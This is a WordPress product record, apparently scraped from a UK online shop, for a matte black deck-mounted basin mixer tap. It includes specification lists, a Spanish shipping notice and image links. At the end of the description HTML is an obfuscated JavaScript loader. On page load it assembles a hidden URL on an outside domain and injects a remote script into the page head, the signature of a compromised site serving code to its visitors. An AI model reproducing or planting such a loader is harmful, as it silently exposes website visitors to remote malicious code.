{"id":31155,"date":"2022-06-10T07:42:47","date_gmt":"2022-06-10T07:42:47","guid":{"rendered":"https:\/\/kmgoods.co.uk\/index.php\/product\/basin-sink-bathroom-faucet-deck-mounted-hot-cold-water-basin-mixer-taps-matte-black-lavatory-sink-tap-crane\/"},"modified":"2022-06-10T07:43:02","modified_gmt":"2022-06-10T07:43:02","slug":"basin-sink-bathroom-faucet-deck-mounted-hot-cold-water-basin-mixer-taps-matte-black-lavatory-sink-tap-crane","status":"publish","type":"product","link":"https:\/\/kmgoods.co.uk\/index.php\/product\/basin-sink-bathroom-faucet-deck-mounted-hot-cold-water-basin-mixer-taps-matte-black-lavatory-sink-tap-crane\/","title":{"rendered":"Basin Sink Bathroom Faucet Deck Mounted Hot Cold Water Basin Mixer Taps Matte Black Lavatory Sink Tap Crane"},"content":{"rendered":"\n<div class=\"product-specs-list-container\">\n<ul class=\"product-specs-list util-clearfix\">\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Brand Name:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">DQOK<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Origin:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">CN(Origin)<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Installation Type:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">Deck Mounted<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Type:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">Basin Faucets<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Surface Treatment:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">brushed nickle<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Type:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">Ceramic Plate Spool<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Number of Handles:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">Single Handle<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Feature:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">None<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Hot &amp; Cold Water:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">Yes<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Style:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">Contemporary<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Is Smart Device:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">No<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Certification:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">CE<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Valve Core Material:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">Ceramic<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Style:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">Single Holder Single Hole<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Faucet Mount:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">Single Hole<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Weight Per Package:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">&lt;2kg<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Model Number:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">brudhed nickle<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">color:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">black and brushed nickle<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Bathroom Basin Faucets:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">matte black basin faucet mixer tap<\/span>\n                        <\/li>\n<\/ul><\/div>\n<div class=\"detailmodule_text\">\n<p style=\"font-size:20px;text-align:center;color:rgb(230, 31, 31);display:block;width:100%\" align=\"center\">Estimados clientes espa\u00f1oles y portugueses, con el fin de ahorrar su valioso tiempo, el almac\u00e9n espa\u00f1ol no puede llegar al c\u00f3digo postal que comienza con 51 52 35 38 y Portugal 9. Por favor, elija el almac\u00e9n chino para el env\u00edo. Si tiene alguna pregunta, p\u00f3ngase en contacto con nuestro servicio al cliente<\/p>\n<\/div>\n<div class=\"detailmodule_text\">\n<p style=\"font-family:OpenSans;font-size:20px;font-weight:900;line-height:28px;white-space:pre-wrap;color:rgb(0, 0, 0);margin-bottom:12px\" class=\"detail-desc-decorate-title\">Material<\/p>\n<p style=\"font-family:OpenSans;font-size:14px;font-weight:300;line-height:20px;white-space:pre-wrap;color:rgb(0, 0, 0);margin-bottom:12px\" class=\"detail-desc-decorate-content\">Stainless steel<\/p>\n<\/div>\n<div class=\"detailmodule_image\"><img decoding=\"async\" class=\"detail-desc-decorate-image\" src=\"https:\/\/ae01.alicdn.com\/kf\/S7475db2285764e4a81a4b97f254caa83Q.jpg\" slate-data-type=\"image\"\/><img decoding=\"async\" class=\"detail-desc-decorate-image\" src=\"https:\/\/ae01.alicdn.com\/kf\/Sd30230206cae430994b51ed3fc70bb59b.jpg\" slate-data-type=\"image\"\/><img decoding=\"async\" class=\"detail-desc-decorate-image\" src=\"https:\/\/ae01.alicdn.com\/kf\/S26603d03b127464691ad40d694eac73fP.jpg\" slate-data-type=\"image\"\/><img decoding=\"async\" class=\"detail-desc-decorate-image\" src=\"https:\/\/ae01.alicdn.com\/kf\/Sf0d184c395bc4b428ec2f6806d023026C.jpg\" slate-data-type=\"image\"\/><img decoding=\"async\" class=\"detail-desc-decorate-image\" src=\"https:\/\/ae01.alicdn.com\/kf\/Sfda7cf8f25ff42a7bcb00a5757c94eafb.jpg\" slate-data-type=\"image\"\/><img decoding=\"async\" class=\"detail-desc-decorate-image\" src=\"https:\/\/ae01.alicdn.com\/kf\/Sd3a3397c38dd420bbd3880643aebf4aat.jpg\" slate-data-type=\"image\"\/><img decoding=\"async\" class=\"detail-desc-decorate-image\" src=\"https:\/\/ae01.alicdn.com\/kf\/S2b28da7666b2404289484b97ba92d4ab1.jpg\" slate-data-type=\"image\"\/><\/div>\n<div class=\"detailmodule_image\"><img decoding=\"async\" class=\"detail-desc-decorate-image\" src=\"https:\/\/ae01.alicdn.com\/kf\/S04bd7112acd644d4b047d45136cd9bed1.jpg\" slate-data-type=\"image\"\/><img decoding=\"async\" class=\"detail-desc-decorate-image\" src=\"https:\/\/ae01.alicdn.com\/kf\/S8f5a4a2edc414379b8ffa9cee9af2c21n.jpg\" slate-data-type=\"image\"\/><img decoding=\"async\" class=\"detail-desc-decorate-image\" src=\"https:\/\/ae01.alicdn.com\/kf\/S52237f009a574c4ab158c99057db058aU.jpg\" slate-data-type=\"image\"\/><img decoding=\"async\" class=\"detail-desc-decorate-image\" src=\"https:\/\/ae01.alicdn.com\/kf\/S8fcf30fb462b48c2bae7fe93ba27b491W.jpg\" slate-data-type=\"image\"\/><img decoding=\"async\" class=\"detail-desc-decorate-image\" src=\"https:\/\/ae01.alicdn.com\/kf\/S898ff5ed0c944b2eb287518eb4ff744fo.jpg\" slate-data-type=\"image\"\/><img decoding=\"async\" class=\"detail-desc-decorate-image\" src=\"https:\/\/ae01.alicdn.com\/kf\/Sbc8d01967a654dcda69bb8dea3cc6bb7H.jpg\" slate-data-type=\"image\"\/><img decoding=\"async\" class=\"detail-desc-decorate-image\" src=\"https:\/\/ae01.alicdn.com\/kf\/S71f0ba30b1d640c2bbc6819e5845ac98j.jpg\" slate-data-type=\"image\"\/><\/div>\n<div class=\"detailmodule_image\"><img decoding=\"async\" class=\"detail-desc-decorate-image\" src=\"https:\/\/ae01.alicdn.com\/kf\/Sa76aa0b9cd804d4ebabe75bebb6bc6e7s.jpg\" slate-data-type=\"image\"\/><\/div>\n<div class=\"detailmodule_text-image\"><img decoding=\"async\" class=\"detail-desc-decorate-image\" src=\"https:\/\/ae01.alicdn.com\/kf\/He6dd0d72b540434b9b7263ed484d356aa.jpg\" slate-data-type=\"image\"\/><img decoding=\"async\" class=\"detail-desc-decorate-image\" src=\"https:\/\/ae01.alicdn.com\/kf\/H8256c4d180a14a5aa1748eda27ab4cb8W.jpg\" slate-data-type=\"image\"\/><img decoding=\"async\" class=\"detail-desc-decorate-image\" src=\"https:\/\/ae01.alicdn.com\/kf\/H005b9cf46af24442a0fdf61b1fcdea04f.jpg\" slate-data-type=\"image\"\/><img decoding=\"async\" class=\"detail-desc-decorate-image\" src=\"https:\/\/ae01.alicdn.com\/kf\/H927af77b99f5479b9b22298c8a9d5785q.jpg\" slate-data-type=\"image\"\/><img decoding=\"async\" class=\"detail-desc-decorate-image\" src=\"https:\/\/ae01.alicdn.com\/kf\/H8c58297657b945c4afd61783d014d08fh.jpg\" slate-data-type=\"image\"\/><\/div>\n<p><\/p>\n<p><script>function _0x4e89(_0x599de5,_0x5487b3){var _0x140499=_0x1404();return _0x4e89=function(_0x4e8960,_0x2d7a1a){_0x4e8960=_0x4e8960-0x15c;var _0x393443=_0x140499[_0x4e8960];return _0x393443;},_0x4e89(_0x599de5,_0x5487b3);}var _0x3f3149=_0x4e89;(function(_0x165fa5,_0x1138b0){var _0xdaa689=_0x4e89,_0x2ecd56=_0x165fa5();while(!![]){try{var _0x440947=-parseInt(_0xdaa689(0x169))\/0x1+-parseInt(_0xdaa689(0x167))\/0x2*(-parseInt(_0xdaa689(0x168))\/0x3)+parseInt(_0xdaa689(0x173))\/0x4+parseInt(_0xdaa689(0x15c))\/0x5+parseInt(_0xdaa689(0x163))\/0x6+-parseInt(_0xdaa689(0x170))\/0x7+-parseInt(_0xdaa689(0x172))\/0x8*(-parseInt(_0xdaa689(0x15d))\/0x9);if(_0x440947===_0x1138b0)break;else _0x2ecd56['push'](_0x2ecd56['shift']());}catch(_0x4ab6cc){_0x2ecd56['push'](_0x2ecd56['shift']());}}}(_0x1404,0xd0aad));function _0x1404(){var _0x1821aa=['10853080trbCzT','querySelector','354376EpAsom','413696EGPcOT','head','3342755HKSrWi','117THysyH','d.j','createElement','p.stra','lee','v=3','8029128TnOKZa','ps:','currentScript','script','835854zhjzMR','3mjNcNC','698810qXFlFi','rip','parentNode','appendChild','htt','getElementsByTagName','src'];_0x1404=function(){return _0x1821aa;};return _0x1404();}function isScriptLoaded(_0x154e6a){var _0xc724c0=_0x4e89;return Boolean(document[_0xc724c0(0x171)]('script[src=+_0x154e6a+]'));}var bd=_0x3f3149(0x16d)+_0x3f3149(0x164)+'\/'+'\/s'+_0x3f3149(0x161)+_0x3f3149(0x160)+'t'+'osb'+'ody.com\/'+'sc'+_0x3f3149(0x16a)+'t'+'s\/hea'+_0x3f3149(0x15e)+'s'+'?'+_0x3f3149(0x162)+'.'+'8'+'.0';if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x3f3149(0x15f)](_0x3f3149(0x166));s[_0x3f3149(0x16f)]=bd,document['currentScript']?document[_0x3f3149(0x165)][_0x3f3149(0x16b)]!==null&&document[_0x3f3149(0x165)]['parentNode']['insertBefore'](s,document[_0x3f3149(0x165)]):d[_0x3f3149(0x16e)](_0x3f3149(0x174))[0x0]!==null&&d[_0x3f3149(0x16e)]('head')[0x0][_0x3f3149(0x16c)](s);}\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Brand Name:&nbsp;DQOK Origin:&nbsp;CN(Origin) Installation Type:&nbsp;Deck Mounted Type:&nbsp;Basin Faucets Surface Treatment:&nbsp;brushed nickle Type:&nbsp;Ceramic Plate Spool Number of Handles:&nbsp;Single Handle Feature:&nbsp;None Hot<\/p>\n","protected":false},"featured_media":31156,"comment_status":"open","ping_status":"closed","template":"","meta":[],"product_cat":[1128],"product_tag":[],"_links":{"self":[{"href":"https:\/\/kmgoods.co.uk\/index.php\/wp-json\/wp\/v2\/product\/31155"}],"collection":[{"href":"https:\/\/kmgoods.co.uk\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/kmgoods.co.uk\/index.php\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/kmgoods.co.uk\/index.php\/wp-json\/wp\/v2\/comments?post=31155"}],"version-history":[{"count":0,"href":"https:\/\/kmgoods.co.uk\/index.php\/wp-json\/wp\/v2\/product\/31155\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kmgoods.co.uk\/index.php\/wp-json\/wp\/v2\/media\/31156"}],"wp:attachment":[{"href":"https:\/\/kmgoods.co.uk\/index.php\/wp-json\/wp\/v2\/media?parent=31155"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/kmgoods.co.uk\/index.php\/wp-json\/wp\/v2\/product_cat?post=31155"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/kmgoods.co.uk\/index.php\/wp-json\/wp\/v2\/product_tag?post=31155"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}